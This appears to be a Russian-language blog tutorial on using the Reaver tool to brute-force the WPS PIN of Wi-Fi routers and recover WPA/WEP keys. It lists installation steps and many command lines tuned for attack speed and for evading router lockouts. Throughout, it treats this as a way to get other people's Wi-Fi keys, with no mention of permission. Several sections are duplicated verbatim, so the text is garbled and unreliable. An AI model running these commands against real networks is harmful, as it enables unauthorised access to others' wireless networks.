#Описание
Все слышали о WPS и его знаменитой дыре,так что начну с середины.
В протоколе WPS существует пин,состоящий из 8 цифр.
В протоколе WPS существует пин,состоящий из 8 цифр.
Reaver реализует брутфорс атаку этого пин-кода. В случае,если пин подобран успешно, Reaver восстанавливает WEP/WPA ключ.
В среднем,работа reaver составляет 10 часов,но в меньшинстве случаев,удается получить ключ от этих ваших вай-фаев и за 3 часа.
В среднем,работа reaver составляет 10 часов,но в меньшинстве случаев,удается получить ключ от этих ваших вай-фаев и за 3 часа.
#Установка
Если вы не решились качать Kali Linux,то на вашей убунте его,скорее всего, нет. Так что для начала скачаем бесплатно без регистрации и смс нужную версию. После распаковки архива,выполняем сборку:
- $ ./configure
- $ make
- # make install
А если захотите удалить,то :
- # make distclean
#Использование
Начнем с перевода адаптера в режим монитора. Я использую адаптер ALFA AWUS 036h
Стандартный запуск выглядит так:
# reaver -i mon0 -b 00:01:02:03:04:05
Запуск с указанием канала и имени точки:
# reaver -i mon0 -b 00:01:02:03:04:05 -c 11 -e Synagoge
Долгие ожидания нам ни к чему,поэтому функция использования маленьких ключей алгоритма DH не создает высокую нагрузку на точку,тем самым значительно увеличивая скорость атаки.
# reaver -i mon0 -b 00:01:02:03:04:05 -vv —dh-small
Бывает,точка меняет каналы и ривер вместе с ней. Задав канал AP,можно отключить прыжки по каналам :
# reaver -i mon0 -b 00:01:02:03:04:05 —fixed
По умолчанию,время тайм-аута составляет 5 секунд,но можно установить иное значение. Делается это для увеличения мощности атаки:
# reaver -i mon0 -b 00:01:02:03:04:05 -t 2
Период отсылки пина равен 1 секунде,если точка не будет против,задержку можно отключить:
# reaver -i mon0 -b 00:01:02:03:04:05 -d 0
Более умные точки доступа блокируют WPS на определенное время,если обнаружат подозрительную активность — чаще,на 5 минут. Ривер будет мониторить состояние активности каждые 315 секунд,а не перебирать пин на блокированном роутере. Задержку можно изменить :
# reaver -i mon0 -b 00:01:02:03:04:05 —lock-delay=250
Стандартный запуск с подробным выводом информации:
# reaver -i mon0 -b 00:01:02:03:04:05 -vv
Стандартный период получения ответных M5 и M7 сообщений равен 0.1 секунде. Тайм-аут также можно изменить (максимальное значение — 1 секунда) :
# reaver -i mon0 -b 00:01:02:03:04:05 -T .5
Многие точки отправляют NACK сообщения,однако по желанию функцию можно отключить. Эта опция в основном бесполезна,так как ривер автоматически определяет правильные nack ответы от access point :
Стандартный запуск выглядит так:
# reaver -i mon0 -b 00:01:02:03:04:05
Запуск с указанием канала и имени точки:
# reaver -i mon0 -b 00:01:02:03:04:05 -c 11 -e Synagoge
Долгие ожидания нам ни к чему,поэтому функция использования маленьких ключей алгоритма DH не создает высокую нагрузку на точку,тем самым значительно увеличивая скорость атаки.
# reaver -i mon0 -b 00:01:02:03:04:05 -vv —dh-small
Бывает,точка меняет каналы и ривер вместе с ней. Задав канал AP,можно отключить прыжки по каналам :
# reaver -i mon0 -b 00:01:02:03:04:05 —fixed
По умолчанию,время тайм-аута составляет 5 секунд,но можно установить иное значение. Делается это для увеличения мощности атаки:
# reaver -i mon0 -b 00:01:02:03:04:05 -t 2
Период отсылки пина равен 1 секунде,если точка не будет против,задержку можно отключить:
# reaver -i mon0 -b 00:01:02:03:04:05 -d 0
Более умные точки доступа блокируют WPS на определенное время,если обнаружат подозрительную активность — чаще,на 5 минут. Ривер будет мониторить состояние активности каждые 315 секунд,а не перебирать пин на блокированном роутере. Задержку можно изменить :
# reaver -i mon0 -b 00:01:02:03:04:05 —lock-delay=250
Стандартный запуск с подробным выводом информации:
# reaver -i mon0 -b 00:01:02:03:04:05 -vv
Стандартный период получения ответных M5 и M7 сообщений равен 0.1 секунде. Тайм-аут также можно изменить (максимальное значение — 1 секунда) :
# reaver -i mon0 -b 00:01:02:03:04:05 -T .5
Многие точки отправляют NACK сообщения,однако по желанию функцию можно отключить. Эта опция в основном бесполезна,так как ривер автоматически определяет правильные nack ответы от access point :
# reaver -i mon0 -b 00:01:02:03:04:05 —nack
Еще одна не часто применимая функция. Иногда access point требует EAP FAIL сообщения для закрытия сессии wps :
# reaver -i mon0 -b 00:01:02:03:04:05 —eap-terminate
Если роутер ограничивает скорость перебора,либо просто перегружен,вы получите 10 последовательных сообщений об ошибке. В таком случае стоит отправить ривер в режим ожидания:
# reaver -i mon0 -b 00:01:02:03:04:05 —fail-wait=360
#В заключение
Еще одна не часто применимая функция. Иногда access point требует EAP FAIL сообщения для закрытия сессии wps :
# reaver -i mon0 -b 00:01:02:03:04:05 —eap-terminate
Если роутер ограничивает скорость перебора,либо просто перегружен,вы получите 10 последовательных сообщений об ошибке. В таком случае стоит отправить ривер в режим ожидания:
# reaver -i mon0 -b 00:01:02:03:04:05 —fail-wait=360
#В заключение
В заключение можно сказать что это не полный список команд,однако,наиболее распространенный. Полный список команд можно узреть командой
# reaver -h
либо
# man reaver
Не стоит атаковать точку при активном подключении к интернету,это снизит скорость в разы,если не уменьшит шансы до нуля.
Проверить wps можно утилитой wash:
# wash -i mon0
# reaver -h
либо
# man reaver
Не стоит атаковать точку при активном подключении к интернету,это снизит скорость в разы,если не уменьшит шансы до нуля.
Проверить wps можно утилитой wash:
# wash -i mon0
Комментарии
Отправить комментарий